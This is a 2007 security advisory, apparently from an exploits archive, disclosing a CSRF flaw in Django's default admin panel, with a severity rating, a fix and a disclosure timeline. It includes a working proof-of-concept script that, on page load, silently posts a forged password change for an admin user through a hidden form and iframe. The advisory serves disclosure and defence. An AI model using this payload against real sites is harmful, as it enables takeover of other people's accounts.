Home / exploits django-csrf.txt
Posted on 30 October 2007
Author: J. Carlos Nieto. Date: Oct 21, 2007 There exists a security hole in the default django's admin panel. Background ========== Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that allows a person with admin privileges to modify the database tables, it allows to change any user password too. See more at http://www.djangoproject.com Summary ======= django has, by default, no CSRF protection, this may allow an attacker to change any user password by tricking a victim with admin privileges into a special forged web page (even in a a totally different server) that sends a request to change the password of the user with id = n. The victim does not know that the form was sent. If the victim has admin privileges the exploit will succeed, otherwise nothing will happen. Severity ======== Mild. This problem exists only with the default installation and can be easily solved using a middleware found in here: http://www.djangoproject.com/documentation/csrf/. Proof of concept ================ <script type="text/javascript"> window.onload = function() { var url = "http://127.0.0.1:8000/admin/auth/user/1/password/"; var pass = "funky"; var param = { password1: pass, password2: pass }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement('<input name="'+i+'">'); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); } </script> <iframe name="hidden" style="display: none"></iframe> Solution ======== Use the django's CSRF protection in all your applications. Take a look at http://www.djangoproject.com/documentation/csrf/. Disclosure Timeline =================== 2007.10.18 - Vulnerability found 2007.10.18 - Vulnerability reported to vendor 2007.10.18 - Vendor response 2007.10.21 - Advisory release License ======= Copyright 2007 J. Carlos Nieto The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.